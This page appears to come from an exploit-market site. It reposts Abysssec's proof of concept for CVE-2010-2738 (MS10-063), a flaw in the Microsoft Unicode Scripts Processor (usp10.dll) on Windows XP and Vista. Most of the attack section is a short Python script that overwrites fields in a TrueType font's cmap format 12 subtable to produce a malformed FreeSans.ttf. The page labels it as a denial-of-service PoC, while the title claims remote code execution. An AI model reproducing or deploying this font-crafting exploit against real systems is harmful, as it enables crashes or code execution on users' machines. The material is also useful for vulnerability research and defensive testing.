[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Unicode Scripts Processor Remote Code Execution

Author
Abysssec
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14269
Category
dos / poc
Date add
01-10-2010
Platform
windows
=========================================================
Microsoft Unicode Scripts Processor Remote Code Execution
=========================================================

  Title             : Microsoft Unicode Scripts Processor Remote Code Execution
  Version           : usp10.dll XP , Vista
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.microsoft.com
  Impact            : Critical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-2738
  MOAUB Number      : MOAUB-FINAL
 
http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/
http://www.exploit-db.com/sploits/moaub-30-PoC.zip
'''
 
import sys
import struct
def main():
    
    try:
                 
        fdR = open('src.ttf', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:18316]
        nGroups = '\x00\x00\x00\xDC'          # nGroups field from Format 12 subtable  of cmap table
        startCharCode = '\x00\xE5\xF7\x20'    # startCharCode  field from a Group Structure
        endCharCode  = '\x00\xE5\xF7\xFE'     # endCharCode  field from a Group Structure
        str2 = strTotal[18328:]
         
        fdW= open('FreeSans.ttf', 'wb+')
        fdW.write(str1)
        fdW.write(nGroups)
        fdW.write(startCharCode)
        fdW.write(endCharCode)
        fdW.write(str2)
        fdW.close()
        fdR.close()
        print '[-] Font file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                 
if __name__ == '__main__':
    main()



#  0day.today [2024-11-16]  #